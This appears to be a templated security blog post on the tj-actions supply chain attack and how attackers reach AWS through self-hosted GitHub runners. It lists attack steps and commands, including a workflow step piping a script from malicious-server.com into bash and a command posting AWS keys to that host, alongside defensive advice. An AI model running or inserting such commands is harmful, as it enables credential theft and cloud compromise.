Listen to this Post
The recent tj-actions supply chain attack has highlighted the vulnerabilities in third-party GitHub actions and how they can be exploited to compromise environments through GitHub runners. This article delves into the step-by-step process of performing such an attack, focusing on AWS compromise through self-hosted GitHub runners.
You Should Know:
1. Understanding GitHub Actions and Runners:
GitHub Actions allow you to automate workflows, and GitHub Runners are the machines that execute these workflows. Self-hosted runners are particularly risky because they run on infrastructure you control, making them a prime target for attackers.
2. Exploiting Third-Party Actions:
Attackers can compromise third-party actions, such as tj-actions, to inject malicious code into your workflows. This can lead to unauthorized access to your AWS environment.
3. Step-by-Step Exploitation:
- Step 1: Identify a vulnerable third-party action in your GitHub workflow.
- Step 2: Inject malicious code into the action, which will be executed by the GitHub runner.
- Step 3: Use the compromised runner to gain access to your AWS credentials stored in the environment.
- Step 4: Exfiltrate sensitive data or deploy malicious resources in your AWS environment.
4. Preventive Measures:
- Code Review: Regularly review the code of third-party actions used in your workflows.
- Least Privilege: Ensure that GitHub runners have the minimum necessary permissions to perform their tasks.
- Monitoring: Implement monitoring and alerting for unusual activity in your GitHub and AWS environments.
Practice Verified Codes and Commands:
1. Check for Vulnerable Actions:
grep -r "uses: .*tj-actions" .github/workflows/
2. Inject Malicious Code:
- name: Malicious Step run: | curl -s http://malicious-server.com/script.sh | bash
3. Exfiltrate AWS Credentials:
export AWS_ACCESS_KEY_ID=$(aws configure get aws_access_key_id) export AWS_SECRET_ACCESS_KEY=$(aws configure get aws_secret_access_key) curl -X POST -d "access_key=$AWS_ACCESS_KEY_ID&secret_key=$AWS_SECRET_ACCESS_KEY" http://malicious-server.com/exfil
4. Monitor GitHub Runner Activity:
journalctl -u github-runner.service -f
5. Revoke Compromised Credentials:
aws iam delete-access-key --user-name <username> --access-key-id <access-key-id>
What Undercode Say:
The tj-actions supply chain attack is a stark reminder of the importance of securing your CI/CD pipelines. By exploiting third-party actions, attackers can easily compromise your environment, especially if you use self-hosted runners. It’s crucial to implement robust security measures, including regular code reviews, least privilege principles, and continuous monitoring.
Expected Output:
- AWS Compromise through Self-Hosted GitHub Runners: A detailed guide on how attackers can exploit third-party GitHub actions to compromise AWS environments.
- Preventive Measures: Steps to secure your GitHub workflows and AWS environment from similar attacks.
- Practice Verified Codes and Commands: Practical commands and scripts to identify vulnerabilities, inject malicious code, exfiltrate credentials, and monitor activity.
For more detailed information, refer to the original article: Hacking Tutorial: AWS Compromise through Self-Hosted Github Runners.
References:
Reported By: Maxwell Zhou – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
